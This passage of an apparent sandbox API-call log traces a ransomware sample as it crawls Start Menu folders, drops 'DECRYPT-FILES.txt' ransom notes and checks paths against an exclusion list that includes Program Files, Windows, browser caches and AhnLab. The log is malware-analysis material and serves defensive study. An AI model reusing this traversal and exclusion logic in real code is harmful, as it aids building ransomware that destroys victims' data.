dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.491] GetLastError () returned 0x5 [0186.491] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 62 [0186.491] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.491] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt") returned 80 [0186.491] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.492] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 62 [0186.492] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0186.492] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.492] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.492] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.492] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.492] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ca2b60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ca2b60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ca2b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.492] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.492] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x63dece0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.492] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.492] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.492] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.492] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.492] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0186.492] lstrcmpW (lpString1="Programs", lpString2=".") returned 1 [0186.492] lstrcmpW (lpString1="Programs", lpString2="..") returned 1 [0186.492] lstrcatW (in: lpString1="Programs", lpString2="\\" | out: lpString1="Programs\\") returned="Programs\\" [0186.492] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="Programs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Program Files") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch=":\\Windows") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Games\\") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\All Users") returned 0x0 [0186.492] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.493] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.493] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.493] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="AhnLab") returned 0x0 [0186.493] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.493] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 71 [0186.493] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.493] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\0a16c9.tmp") returned 82 [0186.493] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.499] GetLastError () returned 0x5 [0186.499] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 71 [0186.499] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.499] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt") returned 89 [0186.499] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.501] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 71 [0186.501] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0186.501] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.501] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.502] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.502] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.502] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0186.502] lstrcmpW (lpString1="Accessories", lpString2=".") returned 1 [0186.502] lstrcmpW (lpString1="Accessories", lpString2="..") returned 1 [0186.502] lstrcatW (in: lpString1="Accessories", lpString2="\\" | out: lpString1="Accessories\\") returned="Accessories\\" [0186.502] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Accessories\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Program Files") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch=":\\Windows") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Games\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\All Users") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="AhnLab") returned 0x0 [0186.502] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.502] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 83 [0186.502] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.502] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\0a16c9.tmp") returned 94 [0186.502] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.511] GetLastError () returned 0x5 [0186.511] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 83 [0186.511] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.511] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt") returned 101 [0186.511] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.512] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 83 [0186.512] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0186.512] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0186.513] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.513] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.513] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.513] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.513] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0186.513] lstrcmpW (lpString1="Accessibility", lpString2=".") returned 1 [0186.513] lstrcmpW (lpString1="Accessibility", lpString2="..") returned 1 [0186.513] lstrcatW (in: lpString1="Accessibility", lpString2="\\" | out: lpString1="Accessibility\\") returned="Accessibility\\" [0186.513] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="Accessibility\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Program Files") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch=":\\Windows") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Games\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\All Users") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="AhnLab") returned 0x0 [0186.513] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.513] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 97 [0186.513] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.513] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\0a16c9.tmp") returned 108 [0186.513] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.520] GetLastError () returned 0x5 [0186.520] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 97 [0186.520] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.520] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt") returned 115 [0186.520] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.521] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 97 [0186.521] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*" [0186.522] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479a38 [0186.522] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.522] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.522] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.522] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0cc8cc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.522] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.522] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec0cd7f5, ftCreationTime.dwHighDateTime=0x1ca042b, 